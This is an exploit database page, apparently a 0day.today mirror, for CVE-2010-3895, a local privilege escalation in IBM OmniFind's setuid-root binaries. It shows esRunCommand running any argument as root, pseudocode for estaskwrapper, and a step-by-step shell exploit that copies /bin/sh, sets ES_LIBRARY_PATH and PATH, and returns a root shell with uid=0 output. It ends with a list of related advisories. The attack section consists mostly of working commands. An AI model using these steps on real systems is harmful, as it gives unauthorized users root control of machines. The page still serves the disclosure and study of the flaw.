Lucene search
Fatih Kilic1337DAY-ID-14762HistoryNov 10, 2010 - 12:00 a.m.
IBM OmniFind Privilege Escalation Vulnerability
2010-11-1000:00:00
Fatih Kilic
0day.today
10
Exploit for windows platform in category local exploits
===============================================
IBM OmniFind Privilege Escalation Vulnerability
===============================================
* Privilege escalation in two applications (CVE-2010-3895)
Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.
-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------
»esRunCommand« takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
[email protected]:/opt/IBM/es/bin> ./esRunCommand id
OUTPUT: cmd is id
id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
The application »estaskwrapper« is meant to start the application »estasklight«.
The pseudo c code looks like this:
-------------------------------------------------------------------------
main() {
int auth = 0;
...
if (argv[1] == "estasklight") {
auth = 1;
...
path = getenv("ES_LIBRARY_PATH");
if (path) {
setenv("LD_LIBRARY_PATH", path);
setenv("LIBPATH", path);
...
if (auth) {
execvp ("estasklight", args);
}
...
}
...
}
...
}
-------------------------------------------------------------------------
Explanation of the code:
»argv[1]« is the first command line argument, that is compared with the string
»estasklight«. If it is equal the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed.
Exploit for running /bin/sh
-------------------------------------------------------------------------
[email protected]:~> cp /bin/sh ~/bin/estasklight
[email protected]:~> export ES_LIBRARY_PATH=/home/joemueller
[email protected]:~> export PATH=/home/joemueller/bin:$PATH
[email protected]:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
# 0day.today [2018-03-28] #Related
prion
prion
Command injection
2010-11-12 22:00:00
Design/Logic Flaw
2010-11-12 22:00:00
exploitpack
exploitpack
IBM OmniFind - Local Privilege Escalation
2010-11-09 00:00:00
nvd
nvd
CVE-2010-3895
2010-11-12 22:00:02
CVE-2010-4236
2010-11-12 22:00:02
cve
cve
CVE-2010-3895
2010-11-12 22:00:02
CVE-2010-4236
2010-11-12 22:00:02
cvelist
cvelist
CVE-2010-3895
2010-11-12 21:00:00
CVE-2010-4236
2010-11-12 21:00:00
exploitdb
exploitdb
IBM OmniFind - Local Privilege Escalation
2010-11-09 00:00:00
packetstorm
packetstorm
IBM OmniFind Cross Site Scripting / Privilege Escalation
2010-11-10 00:00:00
securityvulns
securityvulns
IBM OmniFind - several vulnerabilities
2010-11-18 00:00:00
Related for 1337DAY-ID-14762